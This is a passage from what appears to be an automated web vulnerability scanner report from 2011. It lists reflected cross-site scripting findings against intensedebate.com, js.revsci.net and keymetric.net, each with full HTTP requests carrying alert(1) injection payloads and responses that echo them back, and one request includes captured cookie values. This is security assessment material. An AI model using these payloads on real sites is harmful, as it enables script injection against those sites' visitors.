the%2BAngel%2BKind|The%2BScientific%2BCommunity%25E2%2580%2599s%2BUncomfortable%2BSpiritual%2BAwakening|The%2BInvisible%2BAnchor%253A%2BSpecial%2BReport|Past%2BLife%2BRegression%2B%25E2%2580%2593%2BHow%2BMany%2BLives%2BHave%2BYou%2BLived%253F|Quantum%2BLullaby%2521|&authors=Burt%2BGoldman|Burt%2BGoldman|Burt%2BGoldman|Burt%2BGoldman|admin|admin|admin|admin|admin|admin|&times=2011-04-28%2B11%253A28%253A15|2011-04-15%2B09%253A33%253A44|2011-04-08%2B07%253A55%253A59|2011-04-08%2B07%253A15%253A41|2011-03-14%2B10%253A30%253A40|2011-03-11%2B09%253A15%253A05|2010-10-26%2B05%253A41%253A50|2010-08-26%2B05%253A00%253A33|2010-08-23%2B09%253A57%253A28|2010-07-07%2B09%253A07%253A49| HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:54:43 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 6378

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getCommentCounts.php7071a'><script>alert(1)</script>269acc97b81?src=wp-2&acct=e2df9b6910383c7e8b7c05e99be5e886&ids=1017|847|811|804|787|778|708|602|593|582|&guids=&links=http://www.quantumjumping.com/blog/meet-your-doppelganger/|http://www.quantumjumping.com/blog/
...[SNIP]...

6.8. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/wordpressTemplateLinkWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88fb1'><script>alert(1)</script>e209ce046d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/wordpressTemplateLinkWrapper2.php88fb1'><script>alert(1)</script>e209ce046d8?acct=e2df9b6910383c7e8b7c05e99be5e886 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:54:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4767

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php88fb1'><script>alert(1)</script>e209ce046d8?acct=e2df9b6910383c7e8b7c05e99be5e886'>
...[SNIP]...

6.9. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /remoteVisit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1aa51'><script>alert(1)</script>0255209e1d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remoteVisit.php1aa51'><script>alert(1)</script>0255209e1d6?acct=e2df9b6910383c7e8b7c05e99be5e886&time=1304488444232 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:54:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4760

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/remoteVisit.php1aa51'><script>alert(1)</script>0255209e1d6?acct=e2df9b6910383c7e8b7c05e99be5e886&time=1304488444232'>
...[SNIP]...

6.10. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload d6955<script>alert(1)</script>ca77a0aed15 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K05540d6955<script>alert(1)</script>ca77a0aed15 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de3fbf4&1&10592&4dbcb06d&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9SEJaSpn5l5JKLO/U2zMplZx83H/bTC237PZPP4jQ9v2WwWS5cZka6FAtm4beqRWw/7FAzLkWXPgIi9Fdj34GJWiNsniOfS7N83ZJCMm7XF401Ak8vWIo3drFxdzUB2XmgOG9ISdXu2T5qiaUXtX5k07+zndetYCXU8uC6WDdbPbEoqZPrF3A8T56voczKp5HJXWppbAhBOpR1Q3V+n/B2dTNvVt6bTFoSl77GnSK+qm0rWdXpvZj5nqF2cft+CWWWDuF/5dASzKewgNKgf7RGFOPCpManPIHMt+4GfyeyPj5zfWNagNFpEckaIJcjc/Ype13DXWWJ+NDW6eNgR8bMyM9Zyz072r8TEAb4Q6wuCg6JC9maofi7MA7OH6/NLciMiiWIPt8V3CxjGnvuXNCsiiDDRDBsuvovIfC96g8LjpthMERi2dozqvhqKIWEsI/+jjOokTawe+rOS60DvuFWr7xsmQPQ+SwE6r+YYXbd3vWeDASYs3zZtgvziWdAwte9TTiQBZeQXMTcL+DH9/78GPE9gQXBY8H1yIDrQ2D68pY3wJmxiV81hz8iDIvqb3GO8EGeZm4kkirwWY1y48ApPVV3IiooXmVPD/xqlUB3XTtm74uulyjk3u6tiKLhMW/7hI0e/jJ17wGo+jgDKCuhaLWdBFwJUWwRWx/BfDZPZrSBLyd5E2jsyn0CtLepyVG2cd1tG1FInaSzBIckUsUbtgraQxhFODw8c0zBy7NOpwEDbGlzNg706flbCLyeANNyYedL1yZOFdplAJIgatt1S4HP6ZgoTEYK06y5+Np0yeHwjqX8uABNrJoH64bFZ8dY9PUtvCG6BNUp/4TINt6lfLnHCBk6Lq5CsUWRP/xPHGguJgxph+ru1g39Q9ELp+QH5J+Y6GoagCsKnJ1mVojp2RB2SwpbIaUPj4Hs9GDc9gUII4rbh4UJH2lmuKuIsMiheOLb6nsyiPGG0fkLn69U3w9lYopzQ9ulijnNkB2BmMz47lmgqJGWZfpzEcQPnUHkt8ubqpZp+ZvSRL1RdIFxVDS0n6A5NHnEWA9Tfhcb4v2tm38busuHAMXI39qv+Ulc4Qmd00nAJFaOb+UJSeHqTI6MD0faH5M2yZGoe/nbCt/+tX3tqNs1zPSmFTZokZkGS09goch/NIwev3f+oHX4J0WMaqS9PKtP8lO8hGdDnAvJppuoB9kTbXAKSD8Fdvn5/0kdBF0xzfU0wKy+lLEkHo5MA04LnHERHrjGPOyYwO; rsi_segs_1000000=pUP15E+BiXIMpzbvRoNY5K4WCE6libZDfViB4H9IvrTgu3a8SAYliDuqRNz2X2BRF3fyy1xVRhGFTmO/fPXiS+0D0CQb33NaZk9PJrifH4iI8SZ3NaFAIUgEOtF7ShhBBzwIRzG8ZzX0QiXR711ecIBc97bH+CzAFUPlmr5AsvICNOFljjN4yoq+qmuVtPv2y8PxcG37h5Ye3ytyRbi38v2yyUTyxrrtj2MvmKxmsDS94nTOSjW6yhvUIXvD7XhJU7W6Y5MyZ35LTh5LAh0Q9PExcAjngY/XokZ5EhcVerk/VDBkR/tN2lrFHxJdpOhNQ29rOfHpnxk/Hu93KXG34ORuQS1IPEIIIGZyKWrSWnaI88MnVv9Sl3lfM0MOYJbK2NkahfwUvdnqg022b6Uio9SZPx03LjNAkItc8fBHYMQWkauU+vYvuTQmZjSMS9jhLMg6tV9RaqS/9zLrug9Z/P1mNscPbko=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de3fc9c&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbcf032&271d956a153787d6fee9112e9c6a9326; rtc_b3Fk=MLsHtzE1ZwprJpGrFhi4hKsp9SpKJjTHfY84CPYdGNEAVThHYM/F8EvK1KuXOWi3hDGoGlklVqD0zN4511BmlDEpLq7lwE0E9BI6f7LWbCSnU7k4gwwQW/9Jd4ievI5czRK32xT6rpDAOJefHMxDM9HZKWLe7J1MM8U7ohi7hEw9kdOspj9vDcN5sTt9SOwMMQoVXDIoXZN5wN+j1HcVS6vx+boZYJm66CsbRePLEh9tfG5+e9b5dbXzIM0W+GrfKajMaZGA1TjWA3CudqXRV5leHu0wUEKddVKXFMpQd2OqNucN1rq3aZgW4gPrhQwRe1pwMfLa7w7GHOUTWMXeW6IGudbQxCFYp/NHFUgc4JwWY3rdy8h1O7dAzPdLO6udIMesIC0/GkSRORgM35f/czrp53pn0oJCgkslqIHrwbgml5qdhVsbpR2Jv3CFnD6JSZT0PIYfCVUIIKv59LTsB5fieVPipsQ9SWmM8XGZ7nbfGTeRpsTHqYiLGamBl6vblHTinIHoAz7wl0thtPZJuEZAiH31SzTb1wzplVTTfHLEtxv8x/m0+sd3aacJTqzvcaz5Ip5yLdtVkaT7lwrKEBx5DISrNNtotRCzT9FXkWZYhjsq+/R0fv70XY8cfHHQ3BNtqzcdsFExW2APG+uYGGiR8dyx8aDnGuoT8HWa+vM1+oCrIAO4+U1IoVydaZ81CmmhmFsqHaLWU3VdKBKAGmTBXWGGHezSJpelIAMXuT76ivBvO9u0Q5WjMt3yg/kpgzrKrZRpRWasK/cG994Vl3afW6aBVULL2PYmFUCFSSkmWz6dWaSLvc8Kjg+xD5MjFEC6vQvRH5vNBGA/pwSwa/fJDhHKAl1btpaFPjPyumzSvyjS3tX0EpazrGuMjeZ/at2Zv/FUxiMdFJByxjPJ0J0RH5UEOqysjl9N+mkURT8IrZDO/Ao6fXukmf9bjieM5KE2/j5RVFQNUVJ/25RZwhOZ9xPJFdijL4Aaiz1SFj+WphXs3GKQZNW1GuO1Lc5Q8AR7RtT+6/b7qGkWXS8uxPHSEaXKyJhXeVsslXULN4phmlBcL5nSXOGTU515y7eStbwJ/J7gX3vZb/+0DLzdhKgHOxSJK1q0hQrybjB3JBdHtUytsqjCexwhGUpxjlv1qHuZkGZagSv6GiLY/X3m4Qp+H7MW+rMqTMt7+0ARhxGtSC6M06ahWZT90JUK5tfjSsYkxmkzhJMPiq2lCjriOlo/yVHxt0wsl12QUj+CHt/ILRuCwfQqh8HEc+s0mdl7UFJEMtCwDantmOufFw1KGkfiGzutO4NcmH9pxHzQUu4oMXdEJd1wqYvpmg5BmRp3yH+c4w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 04 May 2011 01:28:58 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 05 May 2011 01:28:58 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 04 May 2011 01:28:57 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K05540D6955<SCRIPT>ALERT(1)</SCRIPT>CA77A0AED15" was not recognized.
*/

6.11. http://km6633.keymetric.net/KM2.js [hist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the hist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2d1f'%3balert(1)//01adbc657d3 was submitted in the hist parameter. This input was echoed as f2d1f';alert(1)//01adbc657d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=f2d1f'%3balert(1)//01adbc657d3&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:47 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5124

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
TString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmE6633=1:0|15097,f2d1f';alert(1)//01adbc657d3;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL6633=1|0|Camp
...[SNIP]...

6.12. http://km6633.keymetric.net/KM2.js [lag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b42a6'%3balert(1)//5352df2d6be was submitted in the lag parameter. This input was echoed as b42a6';alert(1)//5352df2d6be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=b42a6'%3balert(1)//5352df2d6be&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:34 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5120

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
':
val = '0'; break;
case 'cpca':
val = 'Campaign not provided'; break;
case 'kmca':
val = 'Campaign not provided'; break;
case 'cpag':
val = 'b42a6';alert(1)//5352df2d6be'; break;
case 'kmag':
val = 'b42a6';alert(1)//5352df2d6be'; break;
case 'kw':
val = 'Raw Query not available'; break;
case 'kmkw':
val = 'Raw Query not
...[SNIP]...

6.13. http://km6633.keymetric.net/KM2.js [las parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the las request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d55c5'%3balert(1)//3bcbcfe8779 was submitted in the las parameter. This input was echoed as d55c5';alert(1)//3bcbcfe8779 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0d55c5'%3balert(1)//3bcbcfe8779&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:06 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5115

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
5097,;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL6633=1|0d55c5';alert(1)//3bcbcfe8779|Campaign not provided|AdGroup not provided|Keyword not provided|unk|Referrer information not available|Raw Query not available;expires=' + kmLat.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
...[SNIP]...

6.14. http://km6633.keymetric.net/KM2.js [lc1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c05ad'%3balert(1)//280f35fb585 was submitted in the lc1 parameter. This input was echoed as c05ad';alert(1)//280f35fb585 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1c05ad'%3balert(1)//280f35fb585&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:47 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5152

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= 'unk'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmc1':
val = '918897899-1c05ad';alert(1)//280f35fb585'; break;
case 'kmc1':
val = '918897899-1c05ad';alert(1)//280f35fb585'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
ca
...[SNIP]...

6.15. http://km6633.keymetric.net/KM2.js [lc2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c99ce'%3balert(1)//e7ed632e646 was submitted in the lc2 parameter. This input was echoed as c99ce';alert(1)//e7ed632e646 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=c99ce'%3balert(1)//e7ed632e646&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
